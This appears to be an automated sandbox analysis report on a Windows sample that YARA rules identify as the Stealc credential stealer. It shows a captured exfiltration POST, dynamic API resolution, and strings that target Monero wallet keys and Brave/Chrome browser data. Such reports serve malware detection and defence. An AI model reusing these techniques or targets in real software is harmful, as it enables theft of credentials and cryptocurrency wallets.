6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 2d 2d 0d 0a Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIJEGIIJDGHDGCBGHCAA--
Sep 26, 2024 21:14:21.912504911 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	15:14:00
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x920000
File size:	1'825'280 bytes
MD5 hash:	AF274B2E6F0B472537F6A2DDD4356070
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2079463767.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11%
Total number of Nodes:	2000
Total number of Limit Nodes:	38

Executed Functions

Function 00939860 Relevance: 73.7, APIs: 33, Strings: 9, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,006F0D70), ref: 009398A1
GetProcAddress.KERNEL32(75900000,006F0DE8), ref: 009398BA
GetProcAddress.KERNEL32(75900000,006F0D10), ref: 009398D2
GetProcAddress.KERNEL32(75900000,006F0E78), ref: 009398EA
GetProcAddress.KERNEL32(75900000,006F0CC8), ref: 00939903
GetProcAddress.KERNEL32(75900000,006F8FA8), ref: 0093991B
GetProcAddress.KERNEL32(75900000,006E4EE0), ref: 00939933
GetProcAddress.KERNEL32(75900000,006E4DC0), ref: 0093994C
GetProcAddress.KERNEL32(75900000,006F0EA8), ref: 00939964
GetProcAddress.KERNEL32(75900000,006F0C38), ref: 0093997C
GetProcAddress.KERNEL32(75900000,006F0C98), ref: 00939995
GetProcAddress.KERNEL32(75900000,006F0CB0), ref: 009399AD
GetProcAddress.KERNEL32(75900000,006E4DE0), ref: 009399C5
GetProcAddress.KERNEL32(75900000,006F0BF0), ref: 009399DE
GetProcAddress.KERNEL32(75900000,006F0D88), ref: 009399F6
GetProcAddress.KERNEL32(75900000,006E4F40), ref: 00939A0E
GetProcAddress.KERNEL32(75900000,006F0EC0), ref: 00939A27
GetProcAddress.KERNEL32(75900000,006F0EF0), ref: 00939A3F
GetProcAddress.KERNEL32(75900000,006E5140), ref: 00939A57
GetProcAddress.KERNEL32(75900000,006F0F98), ref: 00939A70
GetProcAddress.KERNEL32(75900000,006E5120), ref: 00939A88
LoadLibraryA.KERNEL32(006F0F20,?,00936A00), ref: 00939A9A
LoadLibraryA.KERNEL32(006F0FB0,?,00936A00), ref: 00939AAB
LoadLibraryA.KERNEL32(006F0F50,?,00936A00), ref: 00939ABD
LoadLibraryA.KERNEL32(006F0F80,?,00936A00), ref: 00939ACF
LoadLibraryA.KERNEL32(006F0F38,?,00936A00), ref: 00939AE0
GetProcAddress.KERNEL32(75070000,006F0F08), ref: 00939B02
GetProcAddress.KERNEL32(75FD0000,006F0F68), ref: 00939B23
GetProcAddress.KERNEL32(75FD0000,006F9578), ref: 00939B3B
GetProcAddress.KERNEL32(75A50000,006F9350), ref: 00939B5D
GetProcAddress.KERNEL32(74E50000,006E5060), ref: 00939B7E
GetProcAddress.KERNEL32(76E80000,006F9018), ref: 00939B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00939BB6

Strings

Qn, xrefs: 00939A7B
o, xrefs: 009398AC
@On, xrefs: 00939A01
Nn, xrefs: 00939926
NtQueryInformationProcess, xrefs: 00939BAA
Mn, xrefs: 009399B8
@Qn, xrefs: 00939A4A
`Pn, xrefs: 00939B71
po, xrefs: 00939894

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Qn$@On$@Qn$NtQueryInformationProcess$`Pn$po$o$Mn$Nn
API String ID: 2238633743-353127860
Opcode ID: e43167228c2de61e1f43585264dccaaef8567aae87a66508368ad6d6ab87d2c2
Instruction ID: 9c4764b9235f323e7f3ea578ca8725097add8e93c36c325dc4ec05006c9d8627
Opcode Fuzzy Hash: e43167228c2de61e1f43585264dccaaef8567aae87a66508368ad6d6ab87d2c2
Instruction Fuzzy Hash: 52A13CB55012409FDB44EFA8EE98A6637F9F78C301704451AE609E32E4DEBDA841DF63

Function 009245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0092460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0092479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009245C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009246D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0092466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00924622

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: e14a1357cd0731b57d82fa52597a422641a8fb63545f09b54b26c201a472b209
Instruction ID: 499ecde9a8e8d8e88c4f5895ceabc1a17a33c46787568a554a2eaf1b6e7c50e6
Opcode Fuzzy Hash: e14a1357cd0731b57d82fa52597a422641a8fb63545f09b54b26c201a472b209
Instruction Fuzzy Hash: 5B4100607C67ACFFE62ABBE49942F9D7A66DFF6B0CF515442EA0052389CFB065004532

Function 0092BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

FindFirstFileA.KERNEL32(00000000,?,00940B32,00940B2B,00000000,?,?,?,009413F4,00940B2A), ref: 0092BEF5
StrCmpCA.SHLWAPI(?,009413F8), ref: 0092BF4D
StrCmpCA.SHLWAPI(?,009413FC), ref: 0092BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0092C7BF
FindClose.KERNEL32(000000FF), ref: 0092C7D1

Strings

\Brave\Preferences, xrefs: 0092C1DB
Brave, xrefs: 0092C102
Preferences, xrefs: 0092C11E
Google Chrome, xrefs: 0092C634

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 570cd45a70185c32fba410e66beede0b163ada9cba38a4bb5415d71513b152e8
Instruction ID: 27818e2c37988327f8f63d7209d9189f50ca00e9a0d2b484120c5a12cfb56456
Opcode Fuzzy Hash: 570cd45a70185c32fba410e66beede0b163ada9cba38a4bb5415d71513b152e8
Instruction Fuzzy Hash: 78424D72900108ABCB14FB60DD96FEE737DABD4300F404558F94AA7195EE34AB49CFA2

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
__aulldiv.LIBCMT ref: 6C6536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C653773
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C65377E
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6537C4
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6537CB
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C653801
__aulldiv.LIBCMT ref: 6C653883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C653902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C653918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C65394C

Strings

GTC, xrefs: 6C653912
AuthcAMDenti, xrefs: 6C653946
MOZ_TIMESTAMP_MODE, xrefs: 6C6535DB
QPC, xrefs: 6C6538FC
GenuntelineI, xrefs: 6C653639

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction ID: 14d1dd1505aced9cd8b45279eaef959e336740e5ad629c5ecbd62bb5e6e0c917
Opcode Fuzzy Hash: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction Fuzzy Hash: B0B1B4B1B083509FDB08DF2AC89461AB7F5EB8A700F15893DF499D3790D770A9018B8E

Function 00934910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0093492C
FindFirstFileA.KERNEL32(?,?), ref: 00934943
StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
FindClose.KERNEL32(000000FF), ref: 00934B92

Strings

%s\%s, xrefs: 009349A4
%s\%s, xrefs: 009349FB
%s\*, xrefs: 00934920

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
